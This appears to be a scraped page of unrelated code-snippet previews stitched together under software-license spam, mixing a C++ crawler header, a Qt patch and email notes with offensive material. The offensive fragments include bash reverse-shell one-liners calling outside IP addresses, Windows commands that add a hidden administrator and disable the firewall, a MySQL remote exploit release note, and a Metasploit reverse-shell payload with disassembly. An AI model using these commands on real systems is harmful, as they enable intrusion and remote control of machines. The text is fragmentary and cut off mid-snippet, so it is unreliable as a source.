🔔 NOTE: If you can, please buy software license to support the authors/developers!
- Go to menu Help > Enter License.
- Copy the license key below and paste it into the textbox > Click the Use License button.
//============================================================================ | |
// Name : OctaneCrawler.cpp | |
// Author : Berlin Brown (berlin dot brown at gmail.com) | |
// Version : | |
// Copyright : Copyright Berlin Brown 2012-2013 | |
// License : BSD | |
// Description : This is the simplest possible web crawler in C++ | |
// Uses boost_regex and boost_algorithm | |
//============================================================================ |
*** | |
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
*** | |
Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
technique) including the previously released mass scanner. | |
The exploit is mirrored at the farlight website http://www.farlight.org. | |
Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
All owned By Kingcope |
import os | |
import urllib2, base64 | |
import sys | |
import urllib | |
class TomcatManager(object): | |
def __init__(self, endpoint, username, password): | |
self.endpoint = endpoint |
smtp mail sending in cPython blocks the GIL. | |
This code is tested on python 2.7.8 and I'm using it with web2py | |
If you use Google Apps for your domain email and if you have admin access, you can easily use the gmail api. | |
Because you have admin access, you can create a "service account" in the Google Developer Console. | |
This makes authentication easy. | |
There are other authorisation methods when you don't have admin access, but they require interaction from the user via a browser. | |
To use this, you need to install these modules (From PyPI): | |
pyOpenSSL |
🔔 NOTE: If you can, please buy software license to support the authors/developers!
--- ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 10:20:38.000000000 +0300 | |
+++ ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 21:59:18.000000000 +0300 | |
@@ -122,7 +122,7 @@ | |
[dockMenu release]; | |
[qtMenuLoader release]; | |
if (reflectionDelegate) { | |
- [NSApp setDelegate:reflectionDelegate]; | |
+ [[NSApplication sharedApplication] setDelegate:reflectionDelegate]; | |
[reflectionDelegate release]; | |
} |
#add a user | |
net user xstpl mwcb /add | |
#add user to local administrators | |
net localgroup administrators /add xstpl | |
#remove firewall | |
netsh firewall set opmode disable | |
#enabled remote desktop |
#bash | |
/bin/sh -i >& /dev/tcp/200.93.248.46/83 0>&1 >>> nc -vvlp 83 | |
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 |
root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin | |
root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin | |
00000000 31DB xor ebx,ebx ; | |
00000002 53 push ebx ; protocol = 0 | |
00000003 43 inc ebx ; int socket(int domain, int type, int protocol); | |
00000004 53 push ebx ; type = SOCK_STREAM | |
00000005 6A02 push byte +0x2 ; domain = AF_UNIX | |
00000007 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args); | |
00000009 58 pop eax ; call = 1 (socket) | |
0000000A 89E1 mov ecx,esp ; args = domain, type, protocol ;struct sockaddr_in { |
#!/usr/bin/env ruby | |
require 'ronin/network/tcp' | |
require 'ronin/ui/output/helpers' | |
require 'combinatorics' | |
include Ronin::Network::TCP, | |
Ronin::UI::Output::Helpers | |
hosts = %w[ |